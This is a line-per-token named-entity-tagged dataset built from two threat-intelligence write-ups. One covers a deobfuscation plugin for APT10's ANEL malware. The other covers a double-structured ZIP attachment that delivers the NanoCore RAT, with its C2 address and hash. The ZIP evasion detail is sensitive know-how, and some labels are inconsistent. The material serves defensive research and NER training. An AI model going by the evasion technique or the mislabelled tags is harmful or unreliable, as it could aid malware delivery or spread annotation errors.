+perform O
+distinct O
+layers O
+of O
+code O
+analysis O
+and O
+optimization O
+, O
+
+referred O
+to O
+as O
+maturity O
+levels O
+. O
+
+One O
+layer O
+will O
+detect O
+shellcode O
+, O
+
+another O
+optimizes O
+it O
+into O
+blocks O
+, O
+
+another O
+determines O
+global O
+variables O
+, O
+
+and O
+so O
+forth O
+. O
+
+The O
+optinsn_t B-TOOL
+: I-TOOL
+:f I-TOOL
+unc E-TOOL
+callback O
+function O
+is O
+called O
+in O
+maturity O
+levels O
+from O
+MMAT_ZERO S-TOOL
+( O
+microcode O
+does O
+not O
+exist O
+) O
+
+to O
+MMAT_GLBOPT2 S-TOOL
+( O
+most O
+global O
+optimizations O
+completed O
+) O
+
+. O
+
+During O
+the O
+callback O
+, O
+
+opaque O
+predicates O
+pattern O
+matching O
+functions O
+are O
+called O
+. O
+
+If O
+the O
+code O
+pattern O
+is O
+matched O
+with O
+the O
+definitions O
+, O
+
+it O
+is O
+replaced O
+with O
+another O
+expression O
+for O
+the O
+deobfuscation O
+. O
+
+This O
+is O
+important O
+to O
+perform O
+in O
+each O
+maturity O
+level O
+as O
+the O
+obfuscated O
+code O
+could O
+be O
+modified O
+or O
+removed O
+as O
+the O
+code O
+becomes O
+more O
+optimized O
+. O
+
+We O
+defined O
+two O
+patterns O
+for O
+analysis O
+of O
+the O
+ANEL S-MAL
+sample O
+. O
+
+The O
+global O
+variable O
+value O
+dword_745BB58C O
+is O
+either O
+even O
+or O
+odd O
+, O
+
+so O
+dword_745BB58C O
+* O
+( O
+dword_745BB58C O
+– O
+1 O
+) O
+
+is O
+always O
+even O
+. O
+
+This O
+results O
+in O
+
+the O
+lowest O
+bit O
+of O
+the O
+negated O
+value O
+becoming O
+1 O
+. O
+
+Thus O
+, O
+
+OR O
+by O
+-2 O
+( O
+0xFFFFFFFE O
+) O
+
+will O
+always O
+produce O
+the O
+value O
+-1 O
+. O
+
+In O
+this O
+case O
+, O
+
+the O
+pattern O
+matching O
+function O
+replaces O
+dword_745BB58C O
+* O
+( O
+dword_745BB58C O
+– O
+1 O
+) O
+
+with O
+2 O
+. O
+
+The O
+global O
+variable O
+value O
+dword_72DBB588 O
+is O
+always O
+0 O
+because O
+the O
+value O
+is O
+not O
+initialized O
+( O
+we O
+can O
+check O
+it O
+by O
+is_loaded B-TOOL
+API E-TOOL
+) O
+
+and O
+has O
+only O
+read O
+accesses O
+. O
+
+So O
+the O
+pattern O
+matching O
+function O
+replaces O
+the O
+global O
+variable O
+with O
+0 O
+. O
+
+There O
+are O
+some O
+variants O
+with O
+this O
+pattern O
+( O
+e.g O
+, O
+the O
+variable O
+– O
+10 O
+< O
+0 O
+) O
+
+, O
+
+where O
+the O
+immediate O
+constant O
+can O
+be O
+different O
+. O
+
+We O
+also O
+observed O
+a O
+pattern O
+that O
+was O
+also O
+using O
+an O
+8-bit O
+portion O
+of O
+the O
+register O
+. O
+
+In O
+the O
+following O
+example O
+, O
+
+the O
+variable O
+v5 O
+in O
+pseudocode O
+is O
+a O
+register O
+operand O
+( O
+cl O
+) O
+
+in O
+microcode O
+. O
+
+We O
+need O
+to O
+check O
+if O
+the O
+value O
+comes O
+from O
+the O
+result O
+of O
+x O
+* O
+( O
+x O
+– O
+1 O
+) O
+
+. O
+
+In O
+another O
+example O
+, O
+
+the O
+variable O
+v2 O
+in O
+pseudocode O
+is O
+a O
+register O
+operand O
+( O
+ecx O
+) O
+
+in O
+microcode O
+. O
+
+We O
+have O
+to O
+validate O
+if O
+a O
+global O
+variable O
+with O
+above-mentioned O
+conditions O
+is O
+assigned O
+to O
+the O
+register O
+. O
+
+Data-flow O
+tracking O
+code O
+was O
+added O
+to O
+detect O
+these O
+use-cases O
+. O
+
+The O
+added O
+code O
+requires O
+that O
+the O
+mblock_t S-TOOL
+pointer O
+information O
+is O
+passed O
+from O
+the O
+argument O
+of O
+optinsn_t B-TOOL
+: I-TOOL
+:f I-TOOL
+unc E-TOOL
+to O
+trace O
+back O
+previous O
+instructions O
+using O
+the O
+mblock_t S-TOOL
+linked O
+list O
+. O
+
+However O
+, O
+
+the O
+callback O
+returns O
+NULL O
+from O
+the O
+mblock_t S-TOOL
+pointer O
+if O
+the O
+instruction O
+is O
+not O
+a O
+top-level O
+one O
+. O
+
+If O
+the O
+setl O
+is O
+always O
+sub-instruction O
+during O
+the O
+optimization O
+, O
+
+we O
+never O
+get O
+the O
+pointer O
+. O
+
+To O
+handle O
+this O
+type O
+of O
+scenario O
+, O
+
+the O
+code O
+was O
+modified O
+to O
+catch O
+and O
+pass O
+the O
+mblock_t S-TOOL
+of O
+the O
+jnz O
+instruction O
+to O
+the O
+sub-instruction O
+. O
+
+The O
+original O
+implementation O
+calls O
+the O
+optblock_t B-TOOL
+: I-TOOL
+:f I-TOOL
+unc E-TOOL
+callback O
+function O
+in O
+MMAT_LOCOPT S-TOOL
+( O
+local O
+optimization O
+and O
+graphing O
+are O
+complete O
+) O
+
+maturity O
+level O
+. O
+
+Rolles O
+previously O
+explained O
+the O
+unflattening O
+algorithm O
+in O
+a O
+Hex-Rays S-TOOL
+blog O
+. O
+
+For O
+brevity O
+I O
+will O
+quickly O
+cover O
+some O
+key O
+points O
+to O
+understand O
+the O
+algorithm O
+at O
+a O
+high O
+level O
+. O
+
+Normally O
+the O
+call O
+flow O
+graph O
+( O
+CFG O
+) O
+
+of O
+a O
+function O
+obfuscated O
+with O
+control O
+flow O
+flattening O
+has O
+a O
+loop O
+structure O
+starting O
+with O
+yellow-colored O
+“ O
+control O
+flow O
+dispatcher O
+” O
+
+like O
+this O
+, O
+
+shown O
+after O
+the O
+First O
+Block O
+. O
+
+The O
+original O
+code O
+is O
+separated O
+into O
+the O
+orange-colored O
+“ O
+first O
+block O
+” O
+
+and O
+green-colored O
+flattened O
+blocks O
+. O
+
+The O
+analyst O
+is O
+then O
+required O
+to O
+resolve O
+the O
+correct O
+next O
+block O
+and O
+modify O
+the O
+destination O
+accordingly O
+. O
+
+The O
+next O
+portion O
+of O
+first O
+block O
+and O
+each O
+flattened O
+block O
+is O
+decided O
+by O
+a O
+“ O
+block O
+comparison O
+variable O
+” O
+
+with O
+an O
+immediate O
+value O
+. O
+
+The O
+value O
+of O
+the O
+variable O
+is O
+assigned O
+to O
+a O
+specific O
+register O
+in O
+each O
+block O
+then O
+compared O
+in O
+a O
+control O
+flow O
+dispatcher O
+and O
+other O
+condition O
+blocks O
+. O
+
+If O
+the O
+variable O
+registers O
+for O
+the O
+comparison O
+and O
+assignment O
+are O
+different O
+, O
+
+the O
+assignment O
+variable O
+is O
+called O
+“ O
+block O
+update O
+variable O
+” O
+
+( O
+which O
+is O
+further O
+explained O
+later O
+) O
+
+. O
+
+The O
+algorithm O
+looks O
+straightforward O
+however O
+some O
+portions O
+of O
+the O
+code O
+had O
+to O
+be O
+modified O
+in O
+order O
+to O
+correctly O
+deobfuscate O
+the O
+code O
+. O
+
+This O
+is O
+further O
+detailed O
+below O
+. O
+
+As O
+previously O
+detailed O
+, O
+
+the O
+original O
+implementation O
+of O
+the O
+code O
+only O
+works O
+in O
+MMAT_LOCOPT S-TOOL
+maturity O
+level O
+. O
+
+Rolles O
+said O
+this O
+was O
+to O
+handle O
+another O
+obfuscation O
+called O
+“ O
+Odd O
+Stack O
+Manipulations O
+” O
+
+, O
+
+referred O
+in O
+his O
+blog O
+) O
+
+. O
+
+However O
+the O
+unflattening O
+of O
+ANEL S-MAL
+code O
+had O
+to O
+be O
+performed O
+in O
+the O
+later O
+maturity O
+level O
+since O
+the O
+assignment O
+of O
+block O
+comparison O
+variable O
+heavily O
+depends O
+on O
+opaque O
+predicates O
+. O
+
+As O
+an O
+example O
+in O
+the O
+following O
+obfuscated O
+function O
+, O
+
+the O
+v3 O
+and O
+v7 O
+variables O
+are O
+assigned O
+to O
+the O
+block O
+comparison O
+variable O
+( O
+b_cmp O
+) O
+
+. O
+
+However O
+the O
+values O
+are O
+dependent O
+on O
+opaque O
+predicates O
+results O
+. O
+
+Once O
+the O
+opaque O
+predicates O
+are O
+broken O
+, O
+
+the O
+loop O
+code O
+becomes O
+simpler O
+. O
+
+Unflattening O
+the O
+code O
+in O
+later O
+maturity O
+levels O
+like O
+MMAT_GLBOPT1 S-TOOL
+and O
+MMAT_GLBOPT2 S-TOOL
+( O
+first O
+and O
+second O
+pass O
+of O
+global O
+optimization O
+) O
+
+caused O
+additional O
+problems O
+. O
+
+The O
+unflattening O
+algorithm O
+requires O
+mapping O
+information O
+between O
+block O
+comparison O
+variable O
+and O
+the O
+actual O
+block O
+number O
+( O
+mblock_t B-TOOL
+: I-TOOL
+:s I-TOOL
+erial E-TOOL
+) O
+
+used O
+in O
+the O
+microcode O
+. O
+
+In O
+later O
+maturity O
+levels O
+, O
+
+some O
+blocks O
+are O
+deleted O
+by O
+the O
+optimization O
+after O
+defeating O
+opaque O
+predicates O
+, O
+
+which O
+removes O
+the O
+mapping O
+information O
+. O
+
+In O
+the O
+example O
+below O
+, O
+
+the O
+blue-highlighted O
+immediate O
+value O
+0x4624F47C O
+is O
+assigned O
+to O
+block O
+comparison O
+variable O
+in O
+the O
+first O
+block O
+. O
+
+The O
+mapping O
+can O
+be O
+created O
+by O
+checking O
+the O
+conditional O
+jump O
+instruction O
+( O
+jnz O
+) O
+
+in O
+MMAT_LOCOPT S-TOOL
+. O
+
+Additionally O
+here O
+is O
+no O
+mapping O
+information O
+in O
+MMAT_GLBOPT2 S-TOOL
+because O
+the O
+condition O
+block O
+that O
+contains O
+the O
+variable O
+has O
+been O
+deleted O
+. O
+
+So O
+the O
+next O
+block O
+of O
+the O
+first O
+one O
+in O
+the O
+level O
+can O
+not O
+be O
+determined O
+. O
+
+To O
+resolve O
+that O
+issue O
+, O
+
+the O
+code O
+was O
+written O
+to O
+link O
+the O
+block O
+comparison O
+variable O
+and O
+block O
+address O
+in O
+MMAT_LOCOPT S-TOOL
+, O
+
+as O
+the O
+block O
+number O
+is O
+changed O
+in O
+each O
+maturity O
+level O
+. O
+
+If O
+the O
+code O
+can’t O
+determine O
+the O
+mapping O
+in O
+later O
+maturity O
+levels O
+, O
+
+it O
+attempts O
+to O
+guess O
+the O
+next O
+block O
+number O
+based O
+on O
+the O
+address O
+, O
+
+considering O
+each O
+block O
+and O
+instruction O
+addresses O
+. O
+
+The O
+guessing O
+is O
+not O
+100% O
+accurate O
+however O
+it O
+works O
+for O
+the O
+majority O
+of O
+obfuscated O
+functions O
+tested O
+. O
+
+Though O
+the O
+original O
+implementation O
+assumes O
+an O
+obfuscated O
+function O
+has O
+only O
+one O
+control O
+flow O
+dispatcher O
+, O
+
+some O
+functions O
+in O
+the O
+ANEL O
+sample O
+have O
+multiple O
+control O
+dispatchers O
+. O
+
+Originally O
+the O
+code O
+called O
+the O
+optblock_t B-TOOL
+: I-TOOL
+:f I-TOOL
+unc E-TOOL
+callback O
+in O
+MMAT_GLBOPT1 S-TOOL
+and O
+MMAT_GLBOPT2 S-TOOL
+, O
+
+as O
+the O
+result O
+was O
+not O
+correct O
+in O
+MMAT_CALLS S-TOOL
+( O
+detecting O
+call O
+arguments O
+) O
+
+. O
+
+However O
+, O
+
+this O
+did O
+not O
+work O
+for O
+functions O
+with O
+three O
+or O
+more O
+dispatchers O
+. O
+
+Additionally O
+, O
+
+Hex-Rays S-TOOL
+kernel O
+doesn’t O
+optimize O
+some O
+functions O
+in O
+MMAT_GLBOPT2 S-TOOL
+if O
+it O
+judges O
+the O
+optimization O
+within O
+the O
+level O
+is O
+not O
+required O
+. O
+
+In O
+this O
+case O
+, O
+
+the O
+callback O
+is O
+executed O
+just O
+once O
+in O
+the O
+implementation O
+. O
+
+To O
+handle O
+multiple O
+control O
+flow O
+dispatchers O
+, O
+
+a O
+callback O
+for O
+decompiler O
+events O
+was O
+implemented O
+. O
+
+The O
+code O
+catches O
+the O
+“ O
+hxe_prealloc O
+” O
+
+event O
+( O
+according O
+to O
+Hex-Rays S-TOOL
+, O
+
+this O
+is O
+the O
+final O
+event O
+for O
+optimizations O
+) O
+
+then O
+calls B-TOOL
+optblock_t I-TOOL
+: I-TOOL
+:f I-TOOL
+unc E-TOOL
+callback O
+. O
+
+Typically O
+this O
+event O
+occurs O
+a O
+few O
+times O
+to O
+several O
+times O
+, O
+
+so O
+the O
+callback O
+can O
+deobfuscate O
+multiple O
+control O
+flow O
+flattenings O
+. O
+
+Other O
+additional O
+modifications O
+were O
+made O
+to O
+the O
+code O
+( O
+e.g O
+, O
+writing O
+a O
+new O
+algorithm O
+for O
+finding O
+control O
+flow O
+dispatcher O
+and O
+first O
+block O
+, O
+
+validating O
+a O
+block O
+comparison O
+variable O
+, O
+
+and O
+so O
+on O
+) O
+
+. O
+
+After O
+the O
+modification O
+, O
+
+for O
+example O
+, O
+
+the O
+following O
+functions O
+with O
+multiple O
+control O
+flow O
+dispatchers O
+can O
+be O
+unflattened O
+. O
+
+The O
+original O
+implementation O
+supports O
+the O
+following O
+two O
+cases O
+of O
+flattened O
+blocks O
+to O
+find O
+a O
+block O
+comparison O
+variable O
+for O
+the O
+next O
+block O
+( O
+the O
+cases O
+are O
+then O
+simplified O
+) O
+
+. O
+
+In O
+the O
+second O
+case O
+, O
+
+block O
+comparison O
+variable O
+is O
+searched O
+in O
+each O
+block O
+of O
+endsWithJcc S-TOOL
+and O
+nonJcc S-TOOL
+. O
+
+If O
+the O
+next O
+block O
+is O
+resolved O
+, O
+
+the O
+CFG O
+( O
+specifically O
+mblock_t B-TOOL
+: I-TOOL
+:p I-TOOL
+redset E-TOOL
+and O
+mblock_t B-TOOL
+: I-TOOL
+:s I-TOOL
+uccset E-TOOL
+) O
+
+and O
+the O
+destination O
+of O
+goto O
+jump O
+instruction O
+are O
+updated O
+. O
+
+The O
+code O
+tracks O
+the O
+block O
+comparison O
+variable O
+in O
+each O
+predecessor O
+and O
+more O
+( O
+if O
+any O
+conditional O
+blocks O
+before O
+the O
+predecessor O
+) O
+
+to O
+identify O
+each O
+next O
+block O
+for O
+unflattening O
+. O
+
+And O
+, O
+
+in O
+the O
+third O
+case O
+that O
+was O
+implemented O
+, O
+
+the O
+block O
+comparison O
+variables O
+are O
+not O
+assigned O
+in O
+the O
+flattened O
+blocks O
+but O
+rather O
+the O
+first O
+blocks O
+according O
+to O
+a O
+condition O
+. O
+
+For O
+example O
+, O
+
+the O
+following O
+microcode O
+graph O
+shows O
+edi O
+is O
+assigned O
+to O
+esi O
+( O
+the O
+block O
+comparison O
+variable O
+in O
+this O
+case O
+) O
+
+in O
+block O
+number O
+7 O
+but O
+the O
+edi O
+value O
+is O
+assigned O
+in O
+block O
+number O
+1 O
+and O
+2 O
+. O
+
+If O
+the O
+immediate O
+value O
+for O
+block O
+comparison O
+variable O
+is O
+not O
+found O
+in O
+the O
+flattened O
+blocks O
+, O
+
+the O
+new O
+code O
+tries O
+to O
+trace O
+the O
+first O
+blocks O
+to O
+obtain O
+the O
+value O
+and O
+reconnects O
+block O
+number O
+1 O
+and O
+2 O
+as O
+successors O
+of O
+block O
+number O
+7 O
+, O
+
+in O
+addition O
+to O
+normal O
+operations O
+mentioned O
+in O
+the O
+original O
+cases O
+. O
+
+In O
+this O
+case O
+, O
+
+the O
+code O
+parses O
+the O
+structure O
+in O
+first O
+blocks O
+then O
+reconnects O
+each O
+conditional O
+blocks O
+under O
+the O
+flattened O
+blocks O
+( O
+#1 O
+and O
+#2 O
+as O
+successors O
+of O
+#13 O
+, O
+
+#3 O
+and O
+#4 O
+as O
+successors O
+of O
+#11 O
+) O
+
+. O
+
+Last O
+, O
+
+but O
+not O
+least O
+, O
+
+in O
+all O
+cases O
+explained O
+here O
+, O
+
+the O
+tail O
+instruction O
+of O
+the O
+dispatcher O
+predecessor O
+can O
+be O
+a O
+conditional O
+jump O
+like O
+jnz O
+, O
+
+not O
+just O
+goto O
+. O
+
+The O
+modified O
+code O
+checks O
+the O
+tail O
+instruction O
+and O
+if O
+the O
+true O
+case O
+destination O
+is O
+a O
+control O
+flow O
+dispatcher O
+, O
+
+it O
+updates O
+the O
+CFG O
+and O
+the O
+destination O
+of O
+the O
+instruction O
+. O
+
+The O
+following O
+changes O
+are O
+minor O
+compared O
+with O
+above O
+referenced O
+ones O
+. O
+
+Additional O
+jump O
+instructions O
+are O
+supported O
+when O
+collecting O
+block O
+comparison O
+variable O
+candidates O
+and O
+mapping O
+between O
+the O
+variable O
+and O
+ea O
+or O
+block O
+number O
+( O
+jnz/jle O
+in O
+JZCollector S-TOOL
+, O
+
+jnz O
+in O
+JZMapper S-TOOL
+) O
+
+. O
+
+An O
+entropy O
+threshold O
+adjustment O
+due O
+to O
+check O
+in O
+high O
+maturity O
+level O
+. O
+
+Multiple O
+block O
+tracking O
+for O
+getting O
+block O
+comparison O
+variable O
+. O
+
+And O
+the O
+last O
+change O
+that O
+was O
+introduced O
+in O
+regards O
+to O
+
+the O
+block O
+update O
+variable O
+referred O
+in O
+the O
+overview O
+. O
+
+Some O
+functions O
+in O
+the O
+ANEL S-MAL
+sample O
+utilize O
+this O
+, O
+
+however O
+the O
+assignment O
+is O
+a O
+little O
+bit O
+tricky O
+. O
+
+By O
+using O
+the O
+and O
+instruction O
+, O
+
+the O
+immediate O
+values O
+used O
+in O
+comparison O
+look O
+different O
+from O
+assigned O
+ones O
+. O
+
+The O
+modified O
+code O
+will O
+consider O
+this O
+. O
+
+The O
+modified O
+tool O
+was O
+tested O
+with O
+an O
+ANEL S-MAL
+5.4.1 O
+payload O
+dropped O
+from O
+a O
+malicious O
+document O
+with O
+the O
+following O
+hash O
+( O
+previously O
+reported O
+by O
+FireEye S-SECTEAM
+) O
+: O
+
+3d2b3c9f50ed36bef90139e6dd250f140c373664984b97a97a5a70333387d18d S-SHA2
+. O
+
+The O
+code O
+is O
+able O
+to O
+deobfuscate O
+34 O
+of O
+38 O
+functions O
+( O
+89% O
+) O
+
+. O
+
+It O
+should O
+be O
+noted O
+every O
+function O
+is O
+not O
+always O
+obfuscated O
+. O
+
+The O
+failure O
+examples O
+are O
+: O
+
+
+Not O
+yet O
+implemented O
+cases O
+( O
+e.g O
+, O
+
+a O
+conditional O
+jump O
+of O
+the O
+dispatcher O
+predecessor’s O
+tail O
+instruction O
+in O
+goto O
+N O
+predecessors O
+case O
+, O
+
+consecutive O
+if-statement O
+flattened O
+blocks O
+) O
+
+. O
+
+An O
+incorrect O
+choice O
+of O
+control O
+flow O
+dispatcher O
+and O
+first O
+block O
+( O
+algorithm O
+error O
+) O
+
+. O
+
+These O
+fixes O
+will O
+be O
+prioritized O
+for O
+future O
+releases O
+. O
+
+Additionally O
+there O
+is O
+a O
+known O
+issue O
+with O
+the O
+result O
+( O
+e.g O
+, O
+the O
+remaining O
+loop O
+or O
+paradoxical O
+decompiled O
+code O
+) O
+
+, O
+
+using O
+the O
+following O
+IDAPython S-TOOL
+command O
+in O
+Output O
+window O
+: O
+
+
+idc.load_and_run_plugin O
+
+( O
+
+“ O
+HexRaysDeob S-TOOL
+” O
+
+, O
+
+0xdead O
+) O
+
+. O
+
+The O
+command O
+will O
+instruct O
+the O
+code O
+to O
+execute O
+only O
+opaque O
+predicates O
+deobfuscation O
+in O
+the O
+current O
+selected O
+function O
+. O
+
+This O
+allows O
+an O
+analyst O
+to O
+quickly O
+check O
+if O
+there O
+are O
+any O
+lost O
+blocks O
+by O
+control O
+flow O
+unflattening O
+. O
+
+After O
+the O
+check O
+, O
+
+the O
+original O
+result O
+can O
+be O
+restored O
+by O
+using O
+the O
+following O
+command O
+: O
+
+
+idc.load_and_run_plugin O
+
+( O
+
+“ O
+HexRaysDeob S-TOOL
+” O
+
+, O
+
+0xf001 O
+) O
+
+. O
+
+The O
+compiler-level O
+obfuscations O
+like O
+opaque O
+predicates O
+and O
+control O
+flow O
+flattening O
+are O
+started O
+to O
+be O
+observed O
+in O
+the O
+wild O
+by O
+analyst O
+and O
+researchers O
+. O
+
+Currently O
+malware O
+with O
+the O
+obfuscations O
+is O
+limited O
+, O
+
+however O
+TAU S-SECTEAM
+expects O
+not O
+only O
+APT10 S-APT
+but O
+also O
+other O
+threat O
+actors O
+will O
+start O
+to O
+use O
+them O
+. O
+
+Unfortunately O
+, O
+
+in O
+order O
+to O
+break O
+the O
+techniques O
+we O
+have O
+to O
+understand O
+both O
+of O
+the O
+obfuscation O
+mechanisms O
+and O
+disassembler O
+tool O
+internals O
+before O
+we O
+can O
+automate O
+the O
+process O
+. O
+
+TAU S-SECTEAM
+modified O
+the O
+original O
+HexRaysDeob S-TOOL
+to O
+make O
+it O
+work O
+for O
+APT10 S-APT
+ANEL S-MAL
+obfuscations O
+. O
+
+The O
+modified O
+code O
+is O
+available O
+publically O
+here O
+. O
+
+The O
+summary O
+of O
+the O
+modifications O
+is O
+: O
+
+
+New O
+patterns O
+and O
+data-flow O
+tracking O
+for O
+opaque O
+predicates O
+. O
+
+Analysis O
+in O
+multiple O
+maturity O
+levels O
+, O
+
+considering O
+multiple O
+control O
+flow O
+dispatchers O
+and O
+various O
+jump O
+cases O
+for O
+control O
+flow O
+flattening O
+. O
+
+The O
+tool O
+can O
+work O
+for O
+almost O
+all O
+obfuscated O
+functions O
+in O
+the O
+tested O
+sample O
+. O
+
+This O
+implementation O
+will O
+deobfuscate O
+approximately O
+89% O
+of O
+encountered O
+functions O
+. O
+
+This O
+provides O
+researchers O
+and O
+analyst O
+broad O
+tool O
+to O
+attack O
+this O
+type O
+of O
+obfuscation O
+, O
+
+and O
+if O
+it O
+adopted O
+in O
+other O
+families O
+. O
+
+In O
+should O
+be O
+noted O
+that O
+the O
+tool O
+may O
+not O
+work O
+for O
+the O
+updated O
+versions O
+of O
+ANEL S-APT
+if O
+they O
+are O
+compiled O
+with O
+different O
+options O
+of O
+the O
+obfuscating O
+compiler O
+. O
+
+Testing O
+in O
+multiple O
+versions O
+is O
+important O
+, O
+
+so O
+TAU S-SECTEAM
+is O
+looking O
+for O
+newer O
+versions O
+ANEL S-APT
+samples O
+. O
+
+Please O
+reach O
+out O
+to O
+our O
+unit O
+if O
+you O
+have O
+relevant O
+samples O
+or O
+need O
+assistance O
+in O
+deobfuscating O
+the O
+codes O
+. O
+
+
+Double O
+Loaded O
+Zip O
+File O
+Delivers O
+Nanocore O
+Most O
+malware O
+sent O
+via O
+emails S-TOOL
+is O
+packaged O
+in O
+archives O
+such O
+as O
+ZIP, O
+RAR, O
+and O
+7z O
+(7-Zip
+) O
+. O
+
+Occasionally, O
+we O
+encounter O
+some O
+clever O
+and O
+creative O
+ways O
+these O
+malicious O
+archives O
+are O
+crafted
+. O
+
+Here O
+we O
+will O
+examine O
+an O
+example O
+of O
+an O
+oddly O
+formatted O
+ZIP O
+archive O
+hiding O
+the O
+NanoCore S-MAL
+malware
+. O
+
+We O
+spotted O
+a O
+courier O
+themed O
+spam O
+campaign O
+on O
+our O
+Secure B-TOOL
+Email I-TOOL
+Gateway E-TOOL
+(SEG S-TOOL
+) O
+cloud O
+recently
+. O
+
+The O
+message O
+claimed O
+to O
+be O
+from O
+an O
+Export O
+Operation O
+Specialist O
+of O
+USCO B-IDTY
+Logistics E-IDTY
+and O
+that O
+it O
+was O
+sent O
+as O
+per O
+their O
+customer O
+request
+. O
+
+Aside O
+from O
+this, O
+there O
+were O
+several O
+other O
+suspicious O
+items O
+we O
+noted: O
+Headers O
+mismatched: O
+The O
+Reply-To O
+and O
+From O
+email S-TOOL
+address O
+were O
+different
+. O
+
+Furthermore, O
+the O
+email S-TOOL
+address O
+used O
+in O
+Reply-To O
+is O
+from O
+a O
+free O
+email S-TOOL
+client O
+Gmail
+. O
+
+Suspicious O
+message O
+body: O
+The O
+attachment O
+was O
+mentioned O
+in O
+the O
+message O
+body O
+twice, O
+making O
+sure O
+to O
+direct O
+the O
+reader’s O
+attention O
+towards O
+the O
+attachment
+. O
+
+Suspicious O
+attachment O
+name: O
+The O
+name O
+of O
+attachment O
+SHIPPING_MX00034900_PL_INV_pdf.zip S-FILE
+ends O
+with O
+pdf.zip S-FILE
+. O
+
+That O
+usually O
+means O
+that O
+the O
+name O
+of O
+the O
+file O
+inside O
+the O
+archive O
+ends O
+with O
+2 O
+known O
+file O
+extensions O
+“pdf.<extension>” O
+(archiving O
+tools O
+usually O
+defaults O
+the O
+<extension> O
+to O
+the O
+archive’s O
+format O
+e.g. O
+zip
+) O
+. O
+
+The O
+attachment O
+SHIPPING_MX00034900_PL_INV_pdf.zip S-FILE
+makes O
+this O
+message O
+stand O
+out
+. O
+
+The O
+ZIP O
+file O
+had O
+a O
+file O
+size O
+significantly O
+greater O
+than O
+that O
+of O
+its O
+uncompressed O
+content
+. O
+
+Typically, O
+the O
+size O
+of O
+the O
+ZIP O
+file O
+should O
+be O
+less O
+than O
+the O
+uncompressed O
+content O
+or, O
+in O
+some O
+cases, O
+ZIP O
+files O
+will O
+grow O
+larger O
+than O
+the O
+original O
+files O
+by O
+a O
+reasonable O
+number O
+of O
+bytes
+. O
+
+ZIP O
+archives O
+are O
+supposed O
+to O
+have O
+one O
+“End O
+of O
+Central O
+Directory” O
+(EOCD) O
+signifying O
+the O
+end O
+of O
+the O
+archive
+. O
+
+Looking O
+deeper O
+into O
+the O
+structure O
+of O
+SHIPPING_MX00034900_PL_INV_pdf.zip S-FILE
+, O
+the O
+attachment O
+has O
+two O
+EOCDs
+. O
+
+After O
+the O
+first O
+EOCD O
+comes O
+some O
+extra O
+data O
+– O
+another O
+ZIP O
+file O
+structure
+. O
+
+It O
+turns O
+out O
+that O
+the O
+first O
+ZIP O
+structure O
+is O
+for O
+the O
+image O
+file O
+order.jpg S-FILE
+while O
+the O
+second O
+one O
+is O
+for O
+an O
+executable O
+file O
+SHIPPING_MX00034900_PL_INV_pdf.exe S-FILE
+. O
+
+Both O
+are O
+compressed O
+when O
+archived, O
+and O
+both O
+indicate O
+that O
+they O
+are O
+the O
+only O
+file O
+in O
+their O
+ZIP O
+structures O
+as O
+indicated O
+in O
+their O
+local O
+file O
+headers O
+and O
+EOCDs O
+respectively
+. O
+
+The O
+image O
+file O
+“order.jpg” O
+contained O
+in O
+the O
+first O
+ZIP O
+structure O
+is O
+actually O
+a O
+non-malicious O
+PNG O
+formatted O
+image O
+file
+. O
+
+This O
+serves O
+as O
+a O
+decoy, O
+an O
+attempt O
+to O
+hide O
+the O
+content O
+of O
+the O
+other O
+ZIP O
+structure
+. O
+
+The O
+image O
+file O
+has O
+been O
+correctly O
+identified O
+by O
+SEG O
+as O
+a O
+PNG O
+when O
+its O
+file O
+extension O
+is O
+.jpg S-FILE
+denoting O
+a O
+JPEG O
+formatted O
+image
+. O
+
+The O
+second O
+ZIP O
+structure O
+contains O
+SHIPPING_MX00034900_PL_INV_pdf.exe S-FILE
+, O
+which O
+is O
+a O
+NanoCore S-MAL
+RAT
+. O
+
+This O
+remote O
+access O
+Trojan S-MAL
+has O
+the O
+capability O
+that O
+allows O
+an O
+attacker O
+to O
+completely O
+take O
+control O
+of O
+the O
+compromised O
+machine
+. O
+
+It O
+connects O
+to O
+its O
+command O
+and O
+control O
+server O
+at O
+194.5.98.85 S-IP
+on O
+port O
+11903
+. O
+
+This O
+NanoCore S-MAL
+RAT O
+is O
+version O
+1.2.2.0 O
+which O
+has O
+been O
+found O
+to O
+be O
+offered O
+for O
+free O
+on O
+the O
+Dark B-IDTY
+Web E-IDTY
+just O
+a O
+few O
+months O
+ago
+. O
+
+We O
+used O
+different O
+archiving O
+tools O
+such O
+as O
+PowerArchiver B-TOOL
+2019 E-TOOL
+, O
+WinZip S-TOOL
+, O
+WinRar S-TOOL
+, O
+7Zip S-TOOL
+, O
+and O
+unzIP S-TOOL S-TOOL
+that O
+is O
+built O
+into O
+the O
+Windows S-OS
+OS O
+in O
+attempting O
+to O
+extract O
+the O
+content O
+of O
+the O
+attachment O
+SHIPPING_MX00034900_PL_INV_pdf.zip S-FILE
+. O
+
+Among O
+these O
+5 O
+tools, O
+only O
+WinZip S-TOOL
+and O
+Windows’ O
+unzIP S-TOOL S-TOOL
+were O
+not O
+able O
+to O
+extract O
+anything O
+from O
+the O
+ZIP O
+file O
+as O
+they O
+encountered O
+an O
+error O
+at O
+the O
+start O
+of O
+the O
+extraction O
+process
+. O
+
+The O
+other O
+archiving O
+tools O
+were O
+able O
+to O
+extract O
+one O
+file O
+from O
+the O
+ZIP O
+attachment O
+– O
+either O
+order.jpg B-FILE
+or I-FILE
+SHIPPING_MX00034900_PL_INV_pdf.exe E-FILE
+. O
+
+
+WinZip S-TOOL
+version O
+11.2 O
+and O
+24.0, O
+and O
+the O
+built-in O
+unzIP S-TOOL S-TOOL
+tool O
+in O
+Windows S-OS
+, O
+recognized O
+that O
+the O
+attachment O
+SHIPPING_MX00034900_PL_INV_pdf.zip S-FILE
+is O
+an O
+invalid O
+archive
+. O
+
+Only O
+WinZip S-TOOL
+gave O
+an O
+explicit O
+reason O
+– O
+the O
+start O
+of O
+central O
+directory O
+of O
+the O
+ZIP O
+was O
+not O
+found
+. O
+
+The O
+central O
+directory O
+it O
+pertained O
+to O
+is O
+the O
+one O
+in O
+the O
+second O
+ZIP O
+structure
+. O
+
+At O
+figure O
+2, O
+the O
+second O
+EOCD O
+indicates O
+that O
+its O
+only O
+central O
+directory O
+is O
+located O
+at O
+file O
+offset O
+0xd148f O
+whereas O
+it O
+is O
+at O
+0xd40d41. O
+(The O
+size O
+of O
+the O
+first O
+
+ZIP O
+structure O
+was O
+not O
+considered.) O
+Meanwhile, O
+the O
+archiving O
+tools O
+PowerArchiver B-TOOL
+2019 E-TOOL
+, O
+WinRar S-TOOL
+, O
+and O
+7Zip S-TOOL
+were O
+able O
+to O
+extract O
+a O
+file O
+from O
+the O
+attachment O
